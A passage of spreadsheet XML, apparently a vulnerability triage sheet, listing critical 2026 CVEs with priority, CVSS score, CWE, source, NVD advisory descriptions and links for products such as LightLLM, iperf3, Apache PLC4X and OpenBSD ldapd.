        <v>9.300000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 visual_only deployments expose an unauthenticated RPyC service with allow_pickle enabled that deserializes attacker-supplied arguments in the remote_infer_images method. Attackers can reach the visual RPyC port and pass objects with __reduce__ methods to execute arbitrary code with service account privileges.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103395</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103470</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>In Internet2 Grouper before 7.5.1 (in some configurations), a user who is allowed to create or edit rules in the User Interface can escalate privileges.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103470</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103475</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 exposes the Yii debug and Gii modules to all IP addresses by setting allowedIPs to ['*'] in its default development configuration. Unauthenticated remote attackers can access the debug endpoint to read sensitive data including session cookies and database queries, or access the Gii endpoint to generate and write PHP files into the application directory.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103475</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74864</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>nginx, go, gin</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter that forces the request with HTTP header "x-webobjects-remote-user" to be treated as sent by a verified user without performing password validation. Since Nginx does not strip this header, any client can supply it arbitrarily and gain access as any user, including a privileged user, without providing a password.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74864</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76142</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Insufficient authentication and access control on the internal-only IPC SOAP endpoint of the Genian NAC/ZTNA policy server allows an unauthenticated attacker to invoke internal functions</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76142</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82824</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Path Traversal vulnerability that allows an attacker to access, create, modify, or delete files.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82824</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82825</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Missing Authentication for Critical Function. This allows an unauthenticated attacker to invoke a critical API, potentially leading to unauthorized retrieval or alteration of sensitive information, or unauthorized manipulation.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82825</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82827</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Use of Hard-coded Cryptographic Key. The Hardcoding of JWT signing secret key allows an attacker to generate unauthorized Bearer tokens and exploit administrative functions.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82827</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82829</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-912</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Hidden Functionality vulnerability which allows an attacker to gain unauthorized access by exploiting hidden accounts or hard coded credentials.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82829</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96822</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in Books Gallery &lt;= 4.8.3 versions.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96822</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101276</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>iperf3 3.21 (esnet/iperf) contains a remote, unauthenticated heap use-after-free: the server's per-test watchdog server_timer_proc() frees streams without cancelling/joining their worker threads, so a blocked worker dereferences a freed iperf_stream; fixed in 3.22.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101276</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101283</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>iperf3 3.20–3.21 (esnet/iperf) has a pre-auth heap buffer overflow in decrypt_rsa_message(): a 256-byte RSA buffer is BIO_read with the attacker-controlled ciphertext length (guard warns only), so an unauthenticated client overflows the heap via an oversized authtoken; fixed in 3.22</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101283</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102508</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-347, CWE-757</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Cryptographic Signature and Improper Certificate Validation in the OPC UA driver of Apache PLC4X (PLC4J) allows an attacker in a network position between client and server to impersonate the OPC UA server and to read, forge or modify secure-channel traffic, including user credential ssent by the client.
The defect manifests differently depending on the version:
- In 0.9.0 through 0.11.0 a failed message-signature check is only logged and never enforced, and there is no mechanism to verify the server certificate: it is taken from the unauthenticated GetEndpoints discovery response and used to encrypt the user's password.
- In 0.12.0 through 0.13.1 the signature check is inverted (valid signatures are rejected, invalid ones accepted), and server certificates are accepted without a trust anchor by default.
- In all affected versions the default security policy is None. Starting with 0.12.0 the driver additionally continues silently at a weaker security policy than the one configured, and starting with 0.13.0 endpoint selection prefers the weakest matching endpoint.
Users checking only for one of these mechanisms may wrongly conclude they are unaffected.
This issue affects Apache PLC4X: from 0.9.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 verifies message signatures correctly, refuses to connect unless the server certificate can be verified against a configured trust store or pinned certificate, defaults to Basic256Sha256 with SignAndEncrypt, and fails the
connection if the negotiated security policy is weaker than the configured one.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102508</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102992</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>piscina is a node.js worker pool implementation. Prior to 4.9.4, 5.3.2, and 6.0.0-rc.5, Piscina stores ThreadPool.options in src/index.ts as a plain object that inherits from Object.prototype. Applications with a separate prototype-pollution primitive can therefore supply inherited values for security-sensitive options that do not have own defaults. An inherited execArgv value is passed to the Node.js Worker constructor and can preload attacker-controlled code in worker threads, an inherited loadBalancer function can execute during task scheduling, and inherited env values can alter worker environments. This issue is fixed in versions 4.9.4, 5.3.2, and 6.0.0-rc.5.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102992</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103547</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>In ldapd in OpenBSD 7.8 before errata 057 and 7.9 before errata 021, delegated BSD authentication results are correlated only by the LDAP child process client file descriptor and LDAP message ID. After a connection closes, a later connection that reuses the same file descriptor and message ID can receive the earlier authentication result. A remote attacker who can reach ldapd can complete a Bind as another identity. A missing connection can also cause a NULL pointer dereference. (ldapd is not enabled by default.)</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103547</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19445</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>A remote, unauthenticated TLS client can make a server crash or call
through a freed pointer if its sni_callback assigns a different context to
SSLSocket.context (the documented way to select a certificate per server
name) and nothing else keeps the original ssl.SSLContext alive. Typical
cases are servers that create an SSLContext per connection or replace it
while connections are open; servers that wrap their listening socket with
it are not affected.
Mitigation: keep a reference to every SSLContext that sets sni_callback for
